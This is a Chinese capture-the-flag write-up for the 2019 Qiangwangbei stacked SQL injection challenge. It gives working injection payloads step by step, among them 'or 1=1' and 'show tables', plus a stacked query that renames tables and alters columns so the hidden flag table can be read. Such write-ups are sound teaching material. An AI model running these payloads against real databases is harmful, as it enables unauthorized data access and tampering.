标签：改表名 查询 堆叠 强网杯 flag 2019 words 1919810931114514 table

 

 输入1进去，发现可以正常输出；

在身上1';发现不能进行正常回显。

 

 

 试了一下 1' or 1=1 #发现有正常回显；

 

 

 再进行查询表；

1';show tables;

 

 

 发现有两个表，只有一个一个的试，没有十分明显的标志；
1';show columns from `1919810931114514`;#

 

 

 第一次试 1919810931114514这个表就发现了flag；

但在查这个数字表名试一定要加反引号``，在这个地方卡了好久。。；

继续查找flag；发现我无法直接查出flag的值；

又去查了一下words的内容

 

 没有找到有用信息；就搜了一下wp，发现还要改表名；只有去改表名；

1';rename table words to word1;rename table `1919810931114514` to words;
alter table words add id int unsigned not null auto_increment primary key;
alter table words change flag data varchar(100);#

将flag的列改为id，以便直接查询；

 

 还是回到了原来的样子；

再用1' or 1=1;# 进行查询；得到flag。

 

 

 总结：这个主要利用了sql的叠堆注入；过滤了太多的关键字，无法直接进行查询。

Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。每一条语句的结束用;(分号)隔开；主要是要用到改表名；

标签：改表名,查询,堆叠,强网杯,flag,2019,words,1919810931114514,table
来源： https://www.cnblogs.com/traverller-2333/p/16200781.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。